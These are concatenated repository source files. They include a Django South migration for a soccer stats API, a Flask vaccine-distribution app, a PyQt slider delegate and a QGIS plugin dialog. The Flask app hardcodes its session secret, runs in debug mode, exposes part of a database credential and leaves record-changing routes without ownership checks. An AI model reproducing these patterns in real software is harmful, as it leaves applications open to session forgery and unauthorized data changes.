            ('number', self.gf('django.db.models.fields.IntegerField')()),
            ('team', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['mls_api.Team'])),
            ('position', self.gf('django.db.models.fields.CharField')(max_length=32)),
        ))
        db.send_create_signal(u'mls_api', ['Player'])
        # Adding model 'GamePlayer' (a player's appearance in one game)
        db.create_table(u'mls_api_gameplayer', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('created', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
            ('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
            ('player', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['mls_api.Player'])),
            ('position', self.gf('django.db.models.fields.CharField')(max_length=32)),
            ('game', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['mls_api.Game'])),
            ('captain', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('team', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['mls_api.Team'])),
        ))
        db.send_create_signal(u'mls_api', ['GamePlayer'])
        # Adding model 'Competition'
        db.create_table(u'mls_api_competition', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('created', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
            ('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
            ('name', self.gf('django.db.models.fields.CharField')(max_length=128)),
            ('slug', self.gf('django.db.models.fields.SlugField')(unique=True, max_length=50)),
            ('year', self.gf('django.db.models.fields.CharField')(max_length=4)),
        ))
        db.send_create_signal(u'mls_api', ['Competition'])
        # Adding model 'Game'
        db.create_table(u'mls_api_game', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('created', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
            ('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
            ('home_team', self.gf('django.db.models.fields.related.ForeignKey')(related_name='home_team', to=orm['mls_api.Team'])),
            ('away_team', self.gf('django.db.models.fields.related.ForeignKey')(related_name='away_team', to=orm['mls_api.Team'])),
            ('start_time', self.gf('django.db.models.fields.DateTimeField')()),
            ('home_score', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True)),
            ('away_score', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True)),
            ('competition', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['mls_api.Competition'])),
            ('stat_link', self.gf('django.db.models.fields.CharField')(max_length=512)),
        ))
        db.send_create_signal(u'mls_api', ['Game'])
        # Adding model 'Substitution'
        db.create_table(u'mls_api_substitution', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('created', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
            ('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
            ('out_player', self.gf('django.db.models.fields.related.ForeignKey')(related_name='subbed_out', to=orm['mls_api.Player'])),
            ('in_player', self.gf('django.db.models.fields.related.ForeignKey')(related_name='subbed_in', to=orm['mls_api.Player'])),
            ('team', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['mls_api.Team'])),
            ('minute', self.gf('django.db.models.fields.IntegerField')()),
        ))
        db.send_create_signal(u'mls_api', ['Substitution'])
        # Adding model 'Goal'
        db.create_table(u'mls_api_goal', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('created', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
            ('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
            ('minute', self.gf('django.db.models.fields.IntegerField')()),
            ('player', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['mls_api.GamePlayer'])),
            ('penalty', self.gf('django.db.models.fields.BooleanField')(default=False)),
        ))
        db.send_create_signal(u'mls_api', ['Goal'])
        # Adding M2M table for field assisted_by on 'Goal'
        db.create_table(u'mls_api_goal_assisted_by', (
            ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
            ('goal', models.ForeignKey(orm[u'mls_api.goal'], null=False)),
            ('gameplayer', models.ForeignKey(orm[u'mls_api.gameplayer'], null=False))
        ))
        db.create_unique(u'mls_api_goal_assisted_by', ['goal_id', 'gameplayer_id'])
        # Adding model 'Booking'
        db.create_table(u'mls_api_booking', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('created', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
            ('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
            ('minute', self.gf('django.db.models.fields.IntegerField')()),
            ('player', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['mls_api.Player'])),
            ('card_color', self.gf('django.db.models.fields.CharField')(max_length=8)),
        ))
        db.send_create_signal(u'mls_api', ['Booking'])

    def backwards(self, orm):
        """Drop every table created by :meth:`forwards`."""
        # Deleting model 'Team'
        db.delete_table(u'mls_api_team')
        # Deleting model 'Player'
        db.delete_table(u'mls_api_player')
        # Deleting model 'GamePlayer'
        db.delete_table(u'mls_api_gameplayer')
        # Deleting model 'Competition'
        db.delete_table(u'mls_api_competition')
        # Deleting model 'Game'
        db.delete_table(u'mls_api_game')
        # Deleting model 'Substitution'
        db.delete_table(u'mls_api_substitution')
        # Deleting model 'Goal'
        db.delete_table(u'mls_api_goal')
        # Removing M2M table for field assisted_by on 'Goal'
        db.delete_table('mls_api_goal_assisted_by')
        # Deleting model 'Booking'
        db.delete_table(u'mls_api_booking')

    # South's frozen ORM snapshot of the app's models (auto-generated).
    models = {
        u'mls_api.booking': {
            'Meta': {'object_name': 'Booking'},
            'card_color': ('django.db.models.fields.CharField', [], {'max_length': '8'}),
            'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'minute': ('django.db.models.fields.IntegerField', [], {}),
            'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'player': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['mls_api.Player']"})
        },
        u'mls_api.competition': {
            'Meta': {'object_name': 'Competition'},
            'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
            'year': ('django.db.models.fields.CharField', [], {'max_length': '4'})
        },
        u'mls_api.game': {
            'Meta': {'object_name': 'Game'},
            'away_score': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
            'away_team': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'away_team'", 'to': u"orm['mls_api.Team']"}),
            'competition': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['mls_api.Competition']"}),
            'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'home_score': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
            'home_team': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'home_team'", 'to': u"orm['mls_api.Team']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'players': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['mls_api.Player']", 'through': u"orm['mls_api.GamePlayer']", 'symmetrical': 'False'}),
            'start_time': ('django.db.models.fields.DateTimeField', [], {}),
            'stat_link': ('django.db.models.fields.CharField', [], {'max_length': '512'})
        },
        u'mls_api.gameplayer': {
            'Meta': {'object_name': 'GamePlayer'},
            'captain': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'game': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['mls_api.Game']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'player': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['mls_api.Player']"}),
            'position': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
            'team': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['mls_api.Team']"})
        },
        u'mls_api.goal': {
            'Meta': {'object_name': 'Goal'},
            'assisted_by': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'assists'", 'symmetrical': 'False', 'to': u"orm['mls_api.GamePlayer']"}),
            'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'minute': ('django.db.models.fields.IntegerField', [], {}),
            'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'penalty': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'player': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['mls_api.GamePlayer']"})
        },
        u'mls_api.player': {
            'Meta': {'object_name': 'Player'},
            'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
            'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'number': ('django.db.models.fields.IntegerField', [], {}),
            'position': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
            'team': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['mls_api.Team']"})
        },
        u'mls_api.substitution': {
            'Meta': {'object_name': 'Substitution'},
            'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'in_player': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'subbed_in'", 'to': u"orm['mls_api.Player']"}),
            'minute': ('django.db.models.fields.IntegerField', [], {}),
            'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'out_player': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'subbed_out'", 'to': u"orm['mls_api.Player']"}),
            'team': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['mls_api.Team']"})
        },
        u'mls_api.team': {
            'Meta': {'object_name': 'Team'},
            'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'})
        }
    }

    complete_apps = ['mls_api']
<reponame>vcoeto/Google-Cloud-API-Vaccines
import redis
from flask import Flask, jsonify, request, redirect, render_template, url_for, session, redirect
import pymongo
from pymongo import MongoClient
import json
from bson import json_util
from bson.objectid import ObjectId
from flask_pymongo import PyMongo
#Hash de password
import bcrypt
import os
# Redis connection holding a short-lived session marker ("prueba") that
# acts as an inactivity timeout for logged-in users.
# NOTE(review): '<PASSWORD>' is a redacted placeholder — the real credential
# must come from configuration/secret storage, never from source control.
host_info = "redis-16819.c124.us-central1-1.gce.cloud.redislabs.com"
r = redis.Redis(host=host_info, port=16819, password='<PASSWORD>')
app = Flask(__name__)
# MongoDB Atlas URI for the ProyectoFinal database (credentials redacted).
app.config["MONGO_URI"]="mongodb+srv://Jorge:<EMAIL>YxUlFA17JUOb@<EMAIL>.net/ProyectoFinal?retryWrites=true&w=majority"
mongo = PyMongo(app)
# Secret key used to sign Flask session cookies.
app.secret_key='secretivekey'
##############################################################
# Routing for the vaccination project:
# - Gobierno (municipal government) accounts create vaccine deliveries.
# - Hospital accounts accept deliveries and vaccinate registered users.
##############################################################
###Gobierno###
# Default (gobierno) route.
@app.route('/')
def index():
    """Landing page: logged-in users go to /home, everyone else sees the login form."""
    if 'username' not in session:
        return render_template('index.html')
    return redirect(url_for('home'))
# /home: greet the logged-in gobierno user and show the delivery form.
@app.route('/home')
def home():
    """Government home page (assumes a logged-in session)."""
    greeting = 'You are logged in as ' + session['username']
    return greeting + render_template('register_reparto.html')
# Login handler for gobierno accounts.
@app.route('/login', methods=['POST'])
def login():
    """Authenticate a government user against the Gobierno collection."""
    users = mongo.db.Gobierno
    login_user = users.find_one({'Username': request.form['username']})
    if login_user:
        # Re-hash the submitted password with the stored salt and compare.
        stored = login_user['Password'].encode('utf-8')
        if bcrypt.hashpw(request.form['pass'].encode('utf-8'), stored) == stored:
            session['username'] = request.form['username']
            # 120-second Redis marker used as an inactivity timeout.
            r.setex("prueba", 120, request.form['username'])
            return redirect(url_for('index'))
    # BUGFIX: the wrong-password branch used to return the placeholder 'Er',
    # which was both meaningless to users and revealed that the username
    # exists (account enumeration). Use one uniform failure message.
    return 'Invalid username/password combination'
#Register
# Registration handler for gobierno accounts.
@app.route('/register', methods=['POST','GET'])
def register():
    """Register a new government (municipio) account; GET shows the form."""
    if request.method=='POST':
        users = mongo.db.Gobierno
        # Reject duplicate usernames.
        existing_user = users.find_one({'Username':request.form['username']})
        if existing_user is None:
            # Hash the password with bcrypt before storing it.
            hashpass = bcrypt.hashpw(request.form['pass'].encode('utf-8'), bcrypt.gensalt())
            # BUGFIX: this statement was corrupted by secret redaction
            # ("<PASSWORD>('utf-8')"), leaving a syntax error. Restored to
            # hashpass.decode('utf-8') — the bcrypt hash is bytes and is
            # stored as str, matching the hospital registration path.
            users.insert({'Municipio': request.form['municipio'],
                          'Username': request.form['username'],
                          'Password': hashpass.decode('utf-8'),
                          'Vacunas_Disp': 0, 'Vacunas_utl': 0})
            session['username']=request.form['username']
            r.setex("prueba", 120, request.form['username'])
            return redirect(url_for('index'))
        # Existing user was not None.
        return 'That username already exists!'
    return render_template('register.html')
###FinalGobierno###
###Hospitales###
# Default hospital route.
@app.route('/hospital')
def index_hospital():
    """Hospital landing page: logged-in users go to their dashboard, others see the login form."""
    if 'username' not in session:
        return render_template('index_hospital.html')
    return redirect(url_for('home_hospital'))
# /home_hospital: hospital dashboard listing its pending deliveries.
@app.route('/home_hospital')
def home_hospital():
    """Show the logged-in hospital's pending vaccine deliveries (repartos)."""
    hospital = mongo.db.Hospital
    existing_hospital = hospital.find_one({'Username': session['username']})
    # Deliveries addressed to this hospital.
    # CLEANUP: removed an unused query of mongo.db.Gobierno (dead database
    # roundtrip) and a Reparto collection variable that was immediately
    # shadowed by the cursor it produced.
    reparto = mongo.db.Reparto.find({'id_Hospital': existing_hospital['_id']})
    return ('You are logged in as hospital ' + session['username']
            + render_template('accept_reparto.html', reparto=reparto,
                              hospital=existing_hospital))
# Login handler for hospital accounts.
@app.route('/login_hospital', methods=['POST'])
def login_hospital():
    """Authenticate a hospital user against the Hospital collection."""
    login_user = mongo.db.Hospital.find_one({'Username': request.form['username']})
    if login_user:
        # Re-hash the submitted password with the stored salt and compare.
        stored = login_user['Password'].encode('utf-8')
        if bcrypt.hashpw(request.form['pass'].encode('utf-8'), stored) == stored:
            session['username'] = request.form['username']
            # 120-second Redis marker used as an inactivity timeout.
            r.setex("prueba", 120, request.form['username'])
            return redirect(url_for('index_hospital'))
    return 'Invalid username/password combination for hospital'
@app.route('/register_hospital', methods=['POST','GET'])
def register_hospital():
    """Register a new hospital account linked to its municipal government."""
    if request.method=='POST':
        users = mongo.db.Hospital
        # Reject duplicate usernames.
        existing_user = users.find_one({'Username':request.form['username']})
        if existing_user is None:
            # Hash the password with bcrypt before storing it.
            hashpass = bcrypt.hashpw(request.form['pass'].encode('utf-8'), bcrypt.gensalt())
            # Find the municipal government this hospital belongs to.
            gobierno = mongo.db.Gobierno
            gobierno_municipal = gobierno.find_one({'Municipio': request.form['municipio']})
            if gobierno_municipal:
                # BUGFIX: restored the redaction-corrupted
                # "<PASSWORD>.decode('utf-8')" to hashpass.decode('utf-8').
                # CLEANUP: removed the unused (and misspelled) local
                # "hosptial = mongo.db.Hospital".
                users.insert({'Nombre': request.form['hospital'],
                              'Username': request.form['username'],
                              'Password': hashpass.decode('utf-8'),
                              'Edad_minima': 65,
                              'Vacunas_disponibles': 0,
                              'Vacunas_utilizadas': 0,
                              'Vacunas_apartadas': 0,
                              'id_municipal': gobierno_municipal['_id']})
                # NOTE(review): this stores 'username_hospital' while every
                # hospital view reads session['username'], so a freshly
                # registered hospital is bounced back to the login page.
                # Probably should be session['username'] — confirm intent
                # before changing.
                session['username_hospital']=request.form['username']
                r.setex("prueba", 120, request.form['username'])
                return redirect(url_for('index_hospital'))
            return 'No existe ese municipio'
        # Existing user was not None.
        return 'That username already exists!'
    return render_template('register_hospital.html')
###FinHospitales###
###Users###
@app.route('/register_user', methods=['POST', 'GET'])
def register_user():
    """Register a citizen (by CURP) for vaccination at a chosen hospital."""
    if request.method != 'POST':
        return render_template('register_user.html')
    users = mongo.db.User
    hospital = mongo.db.Hospital
    nombhosp = hospital.find_one({'Nombre': request.form['Hospital']})
    existing_user = users.find_one({'CURP': request.form['CURP']})
    # Guard clauses: unknown hospital or duplicate CURP, under-age, no stock.
    if nombhosp is None or existing_user is not None:
        return f'<h1>El usuario ya existe o el hospital no existe </h1>'
    if int(request.form['Edad']) < nombhosp["Edad_minima"]:
        return 'Por el momento no estamos vacunando a las personas de su edad'
    if nombhosp["Vacunas_disponibles"] <= 0:
        return 'Ya no quedan vacunas en este hospital'
    # Create the citizen record and move one vaccine from available to reserved.
    users.insert({'CURP': request.form['CURP'], 'Edad': request.form['Edad'],
                  'Hospital': request.form['Hospital'], 'Vacunado': 'S'})
    nombhosp['Vacunas_apartadas'] = nombhosp['Vacunas_apartadas'] + 1
    nombhosp['Vacunas_disponibles'] = nombhosp['Vacunas_disponibles'] - 1
    hospital.save(nombhosp)
    return 'updated hospital y created user'
#End of frontend login
##############################################################################
###Creacion de repartos###
@app.route('/register_reparto', methods=['POST','GET'])
def register_reparto():
    """Create a vaccine delivery (reparto) from the logged-in government to a hospital."""
    if request.method != 'POST':
        return render_template('register_reparto.html')
    users = mongo.db.Gobierno
    hospital = mongo.db.Hospital
    reparto = mongo.db.Reparto
    existing_hospital = hospital.find_one({'Nombre': request.form['hospital']})
    existing_user = users.find_one({'Username': session['username']})
    # CLEANUP: removed the unused local vacunas_string and the dead
    # commented-out insert/session statements.
    if not existing_hospital:
        return 'NO EXISTE HOSPITAL'
    # Inactivity-timeout check via the Redis marker.
    if r.get("prueba") is None:
        return "sesion timeout" + render_template("index.html")
    reparto.insert({'id_Hospital': existing_hospital['_id'],
                    'Vacunas': request.form['vacunas'],
                    'id_Municipal': existing_user['_id'],
                    'estado': 'enviado'})
    return redirect(url_for('index'))
###Fin creacion de repartos###
@app.route('/accept_reparto/<oid>', methods=['POST','GET'])
def accept_reparto(oid):
    """Mark a delivery as accepted and add its vaccines to the hospital stock."""
    # Inactivity-timeout check via the Redis marker.
    if r.get("prueba") is None:
        return "sesion timeout" + render_template("index_hospital.html")
    reparto_collection = mongo.db.Reparto
    hospital_collection = mongo.db.Hospital
    delivery = reparto_collection.find_one({'_id': ObjectId(oid)})
    current_hospital = hospital_collection.find_one({'Username': session['username']})
    delivery['estado'] = "aceptado"
    current_hospital['Vacunas_disponibles'] += int(delivery['Vacunas'])
    reparto_collection.save(delivery)
    hospital_collection.save(current_hospital)
    return redirect(url_for('home_hospital'))
#TO DO
@app.route('/main_vacunados')
def main_vacunados():
    """List the citizens registered at the logged-in hospital."""
    # Inactivity-timeout check via the Redis marker.
    if r.get("prueba") is None:
        return "sesion timeout" + render_template("index_hospital.html")
    hospital = mongo.db.Hospital
    current_hospital = hospital.find_one({'Username': session['username']})
    user = mongo.db.User.find({'Hospital': current_hospital['Nombre']})
    return ('You are logged in as hospital ' + session['username']
            + render_template('main_vacunados.html', user=user,
                              hospital=current_hospital))
#TO DO
@app.route('/accept_vacunados/<oid>', methods=['POST','GET'])
def accept_vacunados(oid):
    """Mark a citizen as vaccinated and update the hospital's counters."""
    # Inactivity-timeout check via the Redis marker.
    if r.get("prueba") is None:
        return "sesion timeout" + render_template("index_hospital.html")
    user_collection = mongo.db.User
    hospital_collection = mongo.db.Hospital
    citizen = user_collection.find_one({'_id': ObjectId(oid)})
    current_hospital = hospital_collection.find_one({'Username': session['username']})
    # Move one vaccine from reserved to used.
    citizen['Vacunado'] = 'V'
    current_hospital['Vacunas_apartadas'] -= 1
    current_hospital['Vacunas_utilizadas'] += 1
    user_collection.save(citizen)
    hospital_collection.save(current_hospital)
    return redirect(url_for('main_vacunados'))
@app.route('/delete_vacunados/<oid>', methods=['POST','GET'])
def delete_vacunados(oid):
    """Remove a citizen registration and return the reserved vaccine to stock."""
    # Inactivity-timeout check via the Redis marker.
    if r.get("prueba") is None:
        return "sesion timeout" + render_template("index_hospital.html")
    user_collection = mongo.db.User
    hospital_collection = mongo.db.Hospital
    citizen = user_collection.find_one({'_id': ObjectId(oid)})
    current_hospital = hospital_collection.find_one({'Username': session['username']})
    # Move one vaccine from reserved back to available.
    current_hospital['Vacunas_apartadas'] -= 1
    current_hospital['Vacunas_disponibles'] += 1
    user_collection.delete_one(citizen)
    hospital_collection.save(current_hospital)
    return redirect(url_for('main_vacunados'))
@app.route('/inicio')
def inicio():
    """Static landing page."""
    return render_template('inicio.html')

#SecretKey
# BUGFIX: app.run() blocks, so the /inicio route used to be defined AFTER
# the __main__ guard and was never registered when running this file
# directly. All routes must be declared before the entry point runs.
if __name__=='__main__':
    app.secret_key='secretivekey'
    app.run(debug=True)
<gh_stars>0
# This code is licensed under the MIT License (see LICENSE file for details)
from PyQt5 import Qt
class SliderDelegate(Qt.QStyledItemDelegate):
    """Item-view delegate that paints a numeric cell value as a slider.

    The model value is mapped linearly from [min_value, max_value] onto
    the slider's 0-100 position. Editing is done by click-and-drag via a
    DragGrabber overlay widget instead of a persistent editor widget.
    """
    def __init__(self, min_value, max_value, parent=None):
        super().__init__(parent)
        # Value range mapped onto the slider's 0-100 position.
        self.min_value = min_value
        self.max_value = max_value
        # Draw with the 'fusion' style so rendering is platform-independent.
        self.style = Qt.QStyleFactory.create('fusion')
        # Overlay widget tracking the mouse during a drag; None when idle.
        self._drag_grabber = None

    def sizeHint(self, option, midx):
        # Fixed size hint; the view may still stretch the cell.
        return Qt.QSize(100,10)

    def paint(self, painter, option, midx):
        """Paint the cell background and the slider representing its value."""
        # Draw the usual item-view panel first (selection highlight etc.).
        self.style.drawPrimitive(Qt.QStyle.PE_PanelItemViewItem, option, painter, option.widget)
        if not midx.isValid():
            return
        d = midx.data()
        # Unwrap QVariant when the binding hands one back.
        if isinstance(d, Qt.QVariant):
            d = d.value()
        slider = Qt.QStyleOptionSlider()
        slider.minimum, slider.maximum = 0, 100
        # Linear map of the value into the 0-100 slider range.
        slider.sliderPosition = int( (d-self.min_value)/(self.max_value-self.min_value) * 100.0 )
        slider.rect = option.rect
        self.style.drawComplexControl(Qt.QStyle.CC_Slider, slider, painter)

    def createEditor(self, parent, option, index):
        # No in-place editor widget: editing happens in editorEvent/DragGrabber.
        return None

    def editorEvent(self, event, model, option, midx):
        """Begin a slider drag on a left-button press inside the cell.

        Spawns a DragGrabber overlay that forwards subsequent mouse x
        positions to on_drag_x_changed, and applies the initial press
        position immediately.
        """
        if not midx.isValid() or not event.type() == Qt.QEvent.MouseButtonPress or event.buttons() != Qt.Qt.LeftButton:
            return False
        # Dispose of any grabber left over from a previous interaction.
        if self._drag_grabber is not None:
            self._drag_grabber.deleteLater()
        # Translate the cell rect from viewport to view-widget coordinates.
        offset = option.widget.viewport().geometry().topLeft()
        rect = Qt.QRect(
            option.rect.left() + offset.x(),
            option.rect.top() + offset.y(),
            option.rect.size().width(),
            option.rect.size().height())
        self._drag_grabber = DragGrabber(option.widget, model, rect, midx)
        self._drag_grabber.destroyed.connect(self.on_drag_grabber_destroyed)
        self._drag_grabber.drag_x_changed.connect(self.on_drag_x_changed)
        return self.on_drag_x_changed(event.localPos().x(), option.rect, model, midx)

    def on_drag_x_changed(self, x, r, model, midx):
        """Convert pixel x within rect r to a clamped value and store it.

        Returns the result of model.setData (True on success).
        NOTE(review): divides by r.width() and by (max_value - min_value);
        assumes a non-empty rect and max_value != min_value — confirm.
        """
        sl, sw = r.left(), r.width()
        v = ((x - sl) / sw) * (self.max_value - self.min_value) + self.min_value
        # Clamp to the configured range.
        if v < self.min_value:
            v = self.min_value
        elif v > self.max_value:
            v = self.max_value
        return model.setData(midx, Qt.QVariant(v), Qt.Qt.EditRole)

    def on_drag_grabber_destroyed(self):
        # The overlay deleted itself (mouse released / drag ended).
        self._drag_grabber = None
class DragGrabber(Qt.QWidget):
    """Invisible overlay widget that covers a single item-view cell and
    forwards horizontal mouse-drag positions to SliderDelegate via the
    drag_x_changed signal.

    It grabs the mouse on creation and destroys itself when the drag ends
    (left button released, another button pressed, or focus lost).
    """

    drag_x_changed = Qt.pyqtSignal(int, Qt.QRect, Qt.QAbstractItemModel, Qt.QModelIndex)

    def __init__(self, parent, model, rect, midx):
        super().__init__(parent)
        # See mouseMoveEvent: the first synthetic no-button move event that
        # follows show() must not be treated as the end of the drag.
        self._ignore_next_no_button_mouse_move_event = True
        self.model = model
        self.midx = midx
        self.setMouseTracking(True)
        # DragGrabber exactly covers the cell it manipulates, so it must be transparent (or simply
        # not paint its background in the first place) in order for the slider to be visible
        # while it is dragged.
        self.setAutoFillBackground(False)
        self.setGeometry(rect)
        self.show()
        self.grabMouse()

    def mouseReleaseEvent(self, event):
        # Any button release ends the drag; the widget disposes of itself.
        event.accept()
        self.releaseMouse()
        self.deleteLater()

    def mouseMoveEvent(self, event):
        event.accept()
        if event.buttons() != Qt.Qt.LeftButton:
            if event.buttons() == Qt.Qt.NoButton and self._ignore_next_no_button_mouse_move_event:
                # In the definition of QApplicationPrivate::sendSyntheticEnterLeave(..), line 2788 of
                # qtbase-opensource-src-5.4.2/src/widgets/kernel/qapplication.cpp, is called when
                # widget visibility changes, including as a result of the widget's first .show() call.
                #
                # The last two lines of sendSyntheticEnterLeave(..):
                # QMouseEvent e(QEvent::MouseMove, pos, windowPos, globalPos, Qt::NoButton, Qt::NoButton, Qt::NoModifier);
                # sendMouseEvent(widgetUnderCursor, &e, widgetUnderCursor, tlw, &qt_button_down, qt_last_mouse_receiver);
                #
                # So, even though sendSyntheticEnterLeave may be being called because a widget was shown
                # in response to a mouse click, the first mouse event the newly created widget will receive
                # if a number of conditions are met, and they are in this case, is the synthetic move event
                # with flags set to indicate that it occurred with no mouse buttons depressed. We consider
                # dragging to have ended when the left mouse button is released, and so we must ignore this
                # synthetic event if our DragGrabber is to exist for more than one event loop iteration.
                self._ignore_next_no_button_mouse_move_event = False
            else:
                self.releaseMouse()
                self.deleteLater()
        else:
            # Left button still held: report the current x position.
            self.drag_x_changed.emit(event.x(), self.rect(), self.model, self.midx)

    def focusOutEvent(self, event):
        # Losing focus mid-drag also terminates the grab.
        self.releaseMouse()
        self.deleteLater()
|
<filename>ui/mainwindow_dialog.py
# -*- coding: utf-8 -*-
# =============================================================================
# Copyright (c) ARMINES / MINES ParisTech
# Created by <NAME> <<EMAIL>>
#
# this file is available under the BSD 3-clause License
# (https://opensource.org/licenses/BSD-3-Clause)
# =============================================================================
import traceback
import os
from PyQt4 import QtGui, QtCore, uic
import requests
import datetime
from qgis.core import *
import qgis.utils
from owslib.sos import SensorObservationService
from gui import CalendarWindow
from ..sos import WGS84conversion, getCapabilitiesSOS200, getSeriesSOS200
from ..sos import GetOfferingsList
from ..features import plotSeries, arraySeries, exportSeries
# Logs
import logging
# Create log for OWSLib package
owslib_log = logging.getLogger('owslib')
# Add formatting and handlers as needed
owslib_log.setLevel(logging.DEBUG)
logging.basicConfig(level=logging.DEBUG)
# Create log for requests package
requests_log = logging.getLogger("requests.packages.urllib3")
requests_log.setLevel(logging.DEBUG)
# Propagate requests' records up to the root logger configured above.
requests_log.propagate = True
def resolve(name, basepath=None):
    """
    Resolve path to a file relative to the plugin given its name.

    argument:
    >>> name:
        File name (string) containing its type.
    >>> basepath:
        Optional directory; when empty or None, the directory of this
        module is used.
    """
    # A falsy basepath (None or '') falls back to the plugin directory.
    base = basepath or os.path.dirname(os.path.realpath(__file__))
    return os.path.join(base, name)
# Build the form class from the Designer .ui file shipped next to this
# module; MainWindowDialog below multiply-inherits from it.
MainWindowForm, _ = uic.loadUiType(os.path.join(
    os.path.dirname(__file__), 'mainwindow.ui'))
class MainWindowDialog(QtGui.QMainWindow, MainWindowForm):
    """
    Create main window - called by the "run" method in the plugin main class -
    with its features.
    """

    def __init__(self, parent=None):
        """Constructor."""
        super(MainWindowDialog, self).__init__(parent)
        # Set up the user interface from Designer.
        # After setupUI you can access any designer object by doing
        # self.<objectname>, and you can use autoconnect slots - see
        # http://qt-project.org/doc/qt-4.8/designer-using-a-ui-file.html
        # #widgets-and-dialogs-with-auto-connect
        self.setupUi(self)
        self.initUI()
        # Time series attributes.
        self.dates = []
        self.values = []
        # SOS related attributes.
        self.sos_service_url = ''
        self.getcap_response = ''  # GetCapabilities response.
        # SensorObservationService instance; set once a server has been
        # selected in showServerSelectionDialog.
        self.sos = None
